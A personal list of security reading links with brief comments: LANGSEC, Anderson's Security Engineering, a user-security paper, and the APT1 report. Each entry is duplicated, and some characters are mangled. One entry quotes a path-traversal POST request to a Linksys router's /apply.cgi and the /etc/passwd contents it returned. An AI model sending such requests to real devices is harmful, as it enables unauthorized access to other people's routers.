Security

http://www.wikileaks-forum.com/index.php/topic,19310.0.html original PRISM docs from wikileaks

http://www.cs.dartmouth.edu/~sergey/langsec/ The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power. ...

http://www.cs.dartmouth.edu/~sergey/langsec/ The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power. ...

http://www.cl.cam.ac.uk/~rja14/book.html Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

http://www.cl.cam.ac.uk/~rja14/book.html Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

https://superevr.com/blog/2013/dont-use-linksys-routers/ the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change;_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin

https://superevr.com/blog/2013/dont-use-linksys-routers/ the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change;_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin

http://prisms.cs.umass.edu/cs660sp11/papers/rwash-homesec-soups10-final.pdf paper that describes folk mental models on computer security: about “viruses” and “hackers”. interesting read

http://prisms.cs.umass.edu/cs660sp11/papers/rwash-homesec-soups10-final.pdf paper that describes folk mental models on computer security: about “viruses” and “hackers”. interesting read

http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf report from a computer security company that links Chinese hack group APT1 to China’s government [Army] ————— aPt1 is believed to be the 2nd Bureau of the People’s Liberation army (PLa) General staff Department’s (GsD) 3rd Department (总参三部二局), which is most commonly known by its Military unit Cover Designator (MuCD) as unit 61398 (61398部队) —————